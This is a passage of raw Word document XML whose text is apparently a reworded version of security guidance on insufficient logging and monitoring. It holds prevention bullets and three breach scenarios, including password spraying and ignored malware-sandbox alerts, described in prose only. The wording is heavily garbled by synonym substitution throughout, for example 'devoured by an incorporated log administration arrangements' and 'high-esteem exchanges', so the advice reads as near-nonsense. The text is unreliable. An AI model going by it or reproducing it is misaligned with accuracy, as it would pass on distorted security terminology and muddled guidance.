        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nsure that logs are produced in an organization that can be effectively devoured by an incorporated log administration arrangements. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Ensure high-esteem exchanges have a review trail with trustworthiness controls to counteract altering or cancellation, for</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> example, add as it were database tables or comparable. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Establish viable checking and cautioning to such an extent that suspicious exercises are distinguished and reacted to in a convenient manner. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Establish or embrace an occurrence reaction and recupera</w:t>
      </w:r>
      <w:r>
        <w:t>tion design, for example, NIST 800-61 rev 2 or later</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t xml:space="preserve">Situation #1: An open source venture gathering programming keep running by a little group was hacked utilizing a blemish in its product. The assailants figured out how to wipe out the interior </w:t>
      </w:r>
      <w:r>
        <w:t>source code archive containing the following adaptation, and the greater part of the discussion substance. In spite of the fact that source could be recuperated, the absence of observing, logging or alarming prompted a far more regrettable break. The gathe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ring programming venture is not any more dynamic accordingly issue. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Situation #2: An aggressor utilizes filters for clients utilizing a typical watchword. They can assume control over all records utilizing this secret key. For every other client, this ou</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tput leaves just a single false login behind. After some days, this might be rehashed with an alternate secret word. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Situation #3: A noteworthy US retailer purportedly had an inner malware investigation sandbox breaking down connections. The sandbox prog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ramming had identified possibly undesirable </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>programming,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> however nobody reacted to this location. The sandbox had been creating notices for quite a while before the break was identified due to fake card exchanges by an outer bank.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00E41CD8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="378F1511" wp14:editId="7B6DA72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3275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FE21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93973"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B502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0169D5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9D9E3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A370AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E9B43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27F342A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F4BC5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63D503A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="002CF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3474C97"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="078CC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6A60FED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="32F41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59041E5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3FB0C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84A3AF9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6186C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0"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="3"/>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
  <w:rsids>
    <w:rsidRoot w:val="00FE2181"/>
    <w:rsid w:val="00052FA3"/>
    <w:rsid w:val="003175A5"/>
    <w:rsid w:val="004019C1"/>
    <w:rsid w:val="009B5728"/>
    <w:rsid w:val="00BD47BB"/>
    <w:rsid w:val="00C07476"/>
    <w:rsid w:val="00E41CD8"/>
    <w:rsid w:val="00FE218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41C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41C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2376</Words>
  <Characters>13547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Julina May Gaddi</dc:creator>
  <cp:lastModifiedBy>Julina May Gaddi</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-05-13T10:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-05-13T10:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>